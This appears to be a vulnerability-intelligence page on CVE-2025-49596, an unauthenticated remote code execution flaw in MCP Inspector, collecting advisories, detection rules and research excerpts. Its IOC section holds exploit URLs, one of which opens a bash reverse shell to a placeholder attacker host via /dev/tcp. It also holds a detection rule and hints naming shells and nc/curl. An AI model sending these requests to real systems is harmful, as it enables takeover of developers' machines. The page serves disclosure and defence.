CVE-2025-49596
published 2025-06-13CVE-2025-49596: The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due…
PriorityP188critical9.4CVSS 4.0
AVNACLATNPRNUIPVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
37.03%
98.3th percentile
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mcpjam | inspector | >= 0 < 1.4.3 | 1.4.3 |
| modelcontextprotocol | inspector | < 0.14.1 | 0.14.1 |
| modelcontextprotocol | inspector | >= 0 < 0.14.1 | 0.14.1 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=↗
urlhxxp://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser↗
- →Monitor for HTTP GET requests to the /sse endpoint on ports 6277 or 0.0.0.0:6277 containing query parameters transportType=stdio and command= — this is the canonical exploit path for CVE-2025-49596. ↗
- →In patched versions (0.14.1+), the proxy responds with HTTP 401 and the body 'Authentication required. Use the session token shown in the console when starting the server' — absence of this response on port 6277 indicates a vulnerable instance. ↗
- →Alert on process spawning from the MCP proxy process (node/npx) where child processes include shells (bash, sh) or network utilities (nc, curl) — the proxy spawns new processes based on the command sent by the client. ↗
- →Use Shodan or internal asset discovery to identify exposed MCP Inspector proxy instances listening on port 6277 — at time of writing 560 instances were publicly exposed. ↗
- →DNS rebinding detection: watch for rapid DNS TTL changes where a domain resolves first to a public IP and then to 127.0.0.1 or 0.0.0.0, which can be used to bypass same-origin policy and reach the unauthenticated MCP Inspector API. ↗
- ·The MCP proxy binds to all network interfaces by default (not just localhost) in vulnerable versions, making it reachable by any attacker on the same network or internet — not just localhost-based CSRF attacks. ↗
- ·CVE-2025-49596 affects all software that embeds or depends on MCP Inspector versions prior to 0.14.1, not just standalone installations. ↗
CVSS provenance
nvdv4.09.4CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.4CRITICAL
osv9.4CRITICAL
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
REC in MCPJam inspector due to HTTP Endpoint exposes
ghsa·2026-01-16·CVSS 9.4
CVE-2026-23744 [CRITICAL] CWE-306 REC in MCPJam inspector due to HTTP Endpoint exposes
REC in MCPJam inspector due to HTTP Endpoint exposes
### Summary
MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.
### Details
MCPJam inspector binds to `0.0.0.0` making its HTTP APIs remotely reac
OSV
REC in MCPJam inspector due to HTTP Endpoint exposes
osv·2026-01-16·CVSS 9.4
CVE-2026-23744 [CRITICAL] REC in MCPJam inspector due to HTTP Endpoint exposes
REC in MCPJam inspector due to HTTP Endpoint exposes
### Summary
MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.
### Details
MCPJam inspector binds to `0.0.0.0` making its HTTP APIs remotely reac
OSV
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
osv·2025-06-13
CVE-2025-49596 [CRITICAL] MCP Inspector proxy server lacks authentication between the Inspector client and proxy
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Credit: Rémy Marot
GHSA
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
ghsa·2025-06-13
CVE-2025-49596 [CRITICAL] CWE-306 MCP Inspector proxy server lacks authentication between the Inspector client and proxy
MCP Inspector proxy server lacks authentication between the Inspector client and proxy
Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Credit: Rémy Marot
VulnCheck
Missing Authentication for Critical Function
vulncheck·2025·CVSS 9.4
CVE-2025-49596 [CRITICAL] Missing Authentication for Critical Function
Missing Authentication for Critical Function
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
Affected: Anthropic MCP inspector
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-49596
Exploit PoC: https://vulncheck.com/xdb/ecd7319bf73d; https://vulncheck.com/xdb/eaa00f3add
Suricata
ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)
suricata·2025-07-09·CVSS 9.4
CVE-2025-49596 [CRITICAL] ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)
ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)
Rule: alert http any any -> $HOME_NET 6277 (msg:"ET WEB_SPECIFIC_APPS Anthropic MCP Inspector Proxy Server-Sent Events (SSE) Unauthenticated Remote Code Execution (CVE-2025-49596)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/sse|3f|"; content:"transportType|3d|stdio"; fast_pattern; content:"command|3d|"; content:"args|3d|"; reference:url,www.tenable.com/blog/how-tenable-research-discovered-a-critical-remote-code-execution-vulnerability-on-anthropic; reference:cve,2025-49596; classtype:web-application-attack; sid:2063366; rev:1; metadata:attack_target Server, created_at 2025_07_09, cve CVE_2025_49596, deployment Perimeter, deplo
Nuclei
MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
nuclei·CVSS 9.4
CVE-2025-49596 [CRITICAL] MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
Template:
id: CVE-2025-49596
info:
name: MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
author: ye11oc4t
severity: critical
description: |
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over s
arXiv
Securing AI Agents in Cyber-Physical Systems: A Survey of Environmental Interactions, Deepfake Threats, and Defenses
arxiv_fulltext·2026-01-28
Securing AI Agents in Cyber-Physical Systems: A Survey of Environmental Interactions, Deepfake Threats, and Defenses
Securing AI Agents in Cyber-Physical Systems: A Survey of Environmental Interactions, Deepfake Threats, and Defenses This manuscript is a preprint intended to rapidly disseminate a survey of security challenges and design principles for AI agents operating in cyber-physical systems. The authors anticipate submitting a substantially revised and polished version to a peer-reviewed journal.
Mohsen Hatami, Van Tuan Pham, Hozefa Lakadawala, Yu Chen^*
Dept. of Electrical & Computer Engineering, Binghamton University, Binghamton, NY 13902, USA
\mhatami1, tpham15, hlakada1, ychen\@binghamton.edu
Journal of \ Class Files, Vol. xx, No. x, January 2026
Shell et al.: A Sample Article Using IEEEtran.cls for IEEE Journals
## Abstract
The increasing integration of AI agents into cyber-physical syst
arXiv
Breaking the Protocol: Security Analysis of the Model Context Protocol Specification and Prompt Injection Vulnerabilities in Tool-Integrated LLM Agents
arxiv_fulltext·2026-01-24
Breaking the Protocol: Security Analysis of the Model Context Protocol Specification and Prompt Injection Vulnerabilities in Tool-Integrated LLM Agents
page1
arabic
fancy
fancy
[R]
0pt
## Abstract
The Model Context Protocol (MCP) has emerged as a de facto standard for integrating Large Language Models with external tools, yet no formal security analysis of the protocol specification exists. We present the first rigorous security analysis of MCP's architectural design, identifying three fundamental protocol-level vulnerabilities: (1) absence of capability attestation allowing servers to claim arbitrary permissions, (2) bidirectional sampling without origin authentication enabling server-side prompt injection, and (3) implicit trust propagation in multi-server configurations. We implement ProtoAmp, a novel framework bridging existing agent security benchmarks to MCP-compliant infrastructure, enabling direct measurement of protocol-speci
arXiv
MCPGuard : Automatically Detecting Vulnerabilities in MCP Servers
arxiv_fulltext·2025-10-27
MCPGuard : Automatically Detecting Vulnerabilities in MCP Servers
CJKUTF8gkai
MCPGuard : Automatically Detecting Vulnerabilities in MCP Servers
tabularc
Bin Wang1,
Zexin Liu1,
Hao Yu1,
Ao Yang1,
Yenan Huang2,
Jing Guo2,
Huangsheng Cheng2,
Hui Li1
Huiyu Wu2 ,
tabular
1Peking University, 2Tencent
\thebinking, zexinliu25, hyu25, jarvisya\@stu.pku.edu.cn,
\roninhuang, fyoungguo, pythoncheng\@tencent.com,
[email protected], [email protected]
## Abstract
The Model Context Protocol (MCP) has emerged as a standardized interface enabling seamless integration between Large Language Models (LLMs) and external data sources and tools. While MCP significantly reduces development complexity and enhances agent capabilities, its openness and extensibility introduce critical security vulnerabilities that threaten system trustworthiness and user data protectio
Hackernews
Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
blogs_hackernews·2026-04-20·CVSS 8.0
CVE-2025-65720 [HIGH] Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain
Cybersecurity researchers have discovered a critical "by design" weakness in the Model Context Protocol's ( MCP ) architecture that could pave the way for remote code execution and have a cascading effect on the artificial intelligence (AI) supply chain.
"This flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories," OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, and Roni
Elastic
MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents — Elastic Security Labs
blogs_elastic·2025-09-19
MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents — Elastic Security Labs
## MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents
An in-depth exploration of MCP tool exploitation techniques and security recommendations for safeguarding AI agents.
## Preamble
The Model Context Protocol (MCP) is a recently proposed open standard for connecting large language models (LLMs) to external tools and data sources in a consistent and standardized way. MCP tools are gaining rapid traction as the backbone of modern AI agents, offering a unified, reusable protocol to connect LLMs with tools and services. Securing these tools remains a challenge because of the multiple attack surfaces that actors can exploit. Given the increase in use of autonomous agents, the risk of using MCP tools has heightened as users are sometimes automatically accepting calli
Elastic
MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents — Elastic Security Labs
blogs_elastic·2025-09-19
MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents — Elastic Security Labs
19 September 2025•Carolina Beretta•Gus Carlock•Andrew Pease
# MCP Tools: Attack Vectors and Defense Recommendations for Autonomous Agents
An in-depth exploration of MCP tool exploitation techniques and security recommendations for safeguarding AI agents.
14 min readGenerative AI, Enablement
## Preamble
The Model Context Protocol (MCP) is a recently proposed open standard for connecting large language models (LLMs) to external tools and data sources in a consistent and standardized way. MCP tools are gaining rapid traction as the backbone of modern AI agents, offering a unified, reusable protocol to connect LLMs with tools and services. Securing these tools remains a challenge because of the multiple attack surfaces that actors can exploit. Given the increase in use of autonomous agent
Tenable
How Tenable Research Discovered a Critical Remote Code Execution Vulnerability on Anthropic MCP Inspector
blogs_tenable·2025-07-09
How Tenable Research Discovered a Critical Remote Code Execution Vulnerability on Anthropic MCP Inspector
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Recorded Future
Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
blogs_recorded_future·CVSS 9.4
CVE-2025-49596 [CRITICAL] Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
## Anthropic MCP Inspector: CVE-2025-49596
## What is CVE-2025-49596?
CVE-2025-49596 is a critical remote code execution vulnerability discovered in Anthropic's MCP Inspector tool. MCP is an open standard allowing AI applications to exchange structured context and actions with external tools, and MCP servers are the lightweight programs that expose those tools and data through the protocol. MCP Inspector is a developer-oriented debugging tool for interactively testing and validating MCP server implementations. Successfully exploiting CVE-2025-49596 allows unauthenticated attackers to conduct remote code execution (RCE).
MCP Inspector consists of:
MCP Inspector Client (MCPI): A web-based UI designed to test and debug MCP servers interactively.
MCP Proxy (MCPP): A server that functions
Recorded Future
Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
blogs_recorded_future·CVSS 9.4
CVE-2025-49596 [CRITICAL] Anthropic MCP Inspector: CVE-2025-49596: Vulnerability Disclosure
# Anthropic MCP Inspector: CVE-2025-49596
## What is CVE-2025-49596?
CVE-2025-49596 is a critical remote code execution vulnerability discovered in Anthropic's MCP Inspector tool. MCP is an open standard allowing AI applications to exchange structured context and actions with external tools, and MCP servers are the lightweight programs that expose those tools and data through the protocol. MCP Inspector is a developer-oriented debugging tool for interactively testing and validating MCP server implementations. Successfully exploiting CVE-2025-49596 allows unauthenticated attackers to conduct remote code execution (RCE).
MCP Inspector consists of:
- MCP Inspector Client (MCPI): A web-based UI designed to test and debug MCP servers interactively.
- MCP Proxy (MCPP): A server that function
https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5ghttps://thenewstack.io/mcp-vulnerability-exposes-the-ai-untrusted-code-crisishttps://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
2025-06-13
Published
Exploited in the wild